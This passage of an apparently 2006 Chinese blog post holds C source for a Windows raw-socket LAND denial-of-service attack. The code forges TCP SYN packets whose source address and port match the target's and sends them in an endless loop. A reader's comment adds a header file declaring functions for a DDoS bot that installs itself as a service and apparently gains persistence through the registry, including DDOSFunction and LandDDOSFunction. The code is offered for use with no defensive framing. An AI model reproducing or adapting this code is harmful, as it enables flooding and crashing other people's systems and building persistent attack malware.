 if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
 {
  return -2;
 }

 //设置ip选项
 flag=true;
 if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
 {
  return -3;
 }
  
 addr_in.sin_family=AF_INET;
 addr_in.sin_port=htons(atoi(clientp->port));
 addr_in.sin_addr.S_un.S_addr=Landresolve(clientp->IP);
 
 //填充IP首部
 ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
 ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
 ipHeader.ident=htons(0xF1C);
 ipHeader.frag_and_flags=0;
 ipHeader.ttl=255;
 ipHeader.proto=IPPROTO_TCP;
 ipHeader.checksum=0;
 ipHeader.sourceIP=Landresolve(clientp->IP);
 ipHeader.destIP=ipHeader.sourceIP;

 //填充TCP首部
 tcpHeader.th_sport=htons(atoi(clientp->port));
 tcpHeader.th_dport=htons(atoi(clientp->port));
 tcpHeader.th_seq=htonl(0xF1C);
 tcpHeader.th_ack=1;
 tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
 tcpHeader.th_flag=2; //修改这里来实现不同的标志位探测,2是SYN,1是FIN,16是ACK探测 等等
 tcpHeader.th_win=htons(2048);
 tcpHeader.th_urp=0;
 tcpHeader.th_sum=0;
 psd_header.saddr=ipHeader.sourceIP;
 psd_header.daddr=ipHeader.destIP;
 psd_header.mbz=0;
 psd_header.ptcl=IPPROTO_TCP;
 psd_header.tcpl=htons(sizeof(tcpHeader));

 //计算校验和
 memcpy(szSendBuf, &psd_header, sizeof(psd_header));
 memcpy(szSendBuf+sizeof(psd_header), &tcpHeader, sizeof(tcpHeader));
 tcpHeader.th_sum=Landchecksum((USHORT *)szSendBuf,sizeof(psd_header)+sizeof(tcpHeader));
 memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
 memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
 memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
 ipHeader.checksum=Landchecksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
 memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
 
 while(1){
    //Sleep(10);//800
    Sleep(15); //500
    for(int i=0;i<10;i++)
    {
    
     Land=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),
     0, (struct sockaddr*)&addr_in, sizeof(addr_in));
     if (Land==SOCKET_ERROR)
     {
      //printf("Land error:%d/n",WSAGetLastError());
      return -4;
     }
    }
   }//end while
 closesocket(sock);
 WSACleanup();
 
 return 0;
}
/***********************************************/

 

 

 



Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=577161

[ 点击此处收藏本文]   发表于 2006年01月12日 2:14 PM


 

 
hnxyy 发表于2006-01-12 2:16 PM  IP: 159.226.208.*
HDservice.h文件:


#if !defined(AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_)
#define AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

#include "resource.h"
#include "winsock2.h"
#include "Ws2tcpip.h"

typedef struct tcphdr //tcp头
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量

}TCP_HEADER;

typedef struct _iphdr //ip头
{
unsigned char h_verlen; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间TTL
unsigned char proto; //8位协议号(TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;

struct //tcp伪头
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz; //置空
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;

typedef struct _clientpara
{
//SOCKET s;
char port[6];
char IP[32];
}CLIENTPARA;

LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
void WINAPI Handler(DWORD Opcode);
void InstallService();
void UninstallService();
unsigned long CALLBACK MainProc(LPVOID pParam);
int start();
void uninstall(void);
void RegMe(void);
DWORD WINAPI GetOS();
char* GetHttpFile(char url[]);
unsigned long CALLBACK SocketThreadProc(LPVOID pParam);
unsigned long CALLBACK DDOSFunction(LPVOID dParam);
USHORT checksum(USHORT *buffer,int size);
void Readme();
void SaveLogToFile(char *content);
USHORT Landchecksum(USHORT *buffer, int size);
unsigned long Landresolve(char *host);
unsigned long CALLBACK LandDDOSFunction(LPVOID dParam);


#endif // !defined(AFX_HDSERVICE_H__BB6B4BC9_1F59_4E00_9F94_A3A04056EF82__INCLUDED_)

你可能感兴趣的:(网络,socket,tcp,header,service,null)